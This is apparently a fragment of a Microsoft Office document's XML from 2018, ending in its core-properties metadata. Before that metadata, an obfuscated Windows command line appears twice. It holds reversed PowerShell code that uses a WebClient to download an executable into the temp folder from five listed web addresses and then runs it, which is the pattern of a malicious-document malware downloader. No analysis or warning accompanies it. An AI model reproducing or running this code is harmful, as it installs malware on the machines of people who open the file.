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1468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%COMSPEC% /V/C"set mJWx=;'LUZ'=frG$}}{hctac};kaerb;'Hvq'=wWi$;ZaB$ metI-ekovnI;'RwG'=jEq$;)ZaB$ ,jim$(eliFdaolnwoD.kLW${yrt{)rwL$ ni jim$(hcaerof;'exe.'+shL$+'\'+pmet:vne$=ZaB$;'Srn'=AAt$;'253' = shL$;'zqL'=mHC$;)'@'(tilpS.'MY2OtYkd/ur.hcirob//:ptth@hxgjr6S/PES/SADZ737/ni.oc.snoitcurtsnoceerhs//:ptth@H8ZMtOcIV7/ni.tracnoillib.oediv-e//:ptth@QwKuedaeXX/ur.oiduts-kt.tsetge//:ptth@bZFk11f3/moc.hcramarik//:ptth'=rwL$;tneilCbeW.teN tcejbo-wen=kLW$;'EDT'=zYo$ llehsrewop&amp;&amp;for /L %b in (443;-1;0)do set N5G=!N5G!!mJWx:~%b,1!&amp;&amp;if %b lss 1 echo !N5G:~-444! |FOR /F "tokens=10 delims=Vtk.G\" %l IN ('ftype^^^|find "sol"')DO %l -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%COMSPEC% /V/C"set mJWx=;'LUZ'=frG$}}{hctac};kaerb;'Hvq'=wWi$;ZaB$ metI-ekovnI;'RwG'=jEq$;)ZaB$ ,jim$(eliFdaolnwoD.kLW${yrt{)rwL$ ni jim$(hcaerof;'exe.'+shL$+'\'+pmet:vne$=ZaB$;'Srn'=AAt$;'253' = shL$;'zqL'=mHC$;)'@'(tilpS.'MY2OtYkd/ur.hcirob//:ptth@hxgjr6S/PES/SADZ737/ni.oc.snoitcurtsnoceerhs//:ptth@H8ZMtOcIV7/ni.tracnoillib.oediv-e//:ptth@QwKuedaeXX/ur.oiduts-kt.tsetge//:ptth@bZFk11f3/moc.hcramarik//:ptth'=rwL$;tneilCbeW.teN tcejbo-wen=kLW$;'EDT'=zYo$ llehsrewop&amp;&amp;for /L %b in (443;-1;0)do set N5G=!N5G!!mJWx:~%b,1!&amp;&amp;if %b lss 1 echo !N5G:~-444! |FOR /F "tokens=10 delims=Vtk.G\" %l IN ('ftype^^^|find "sol"')DO %l -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1:00Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <cp:keywords/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-28T14:11:00Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>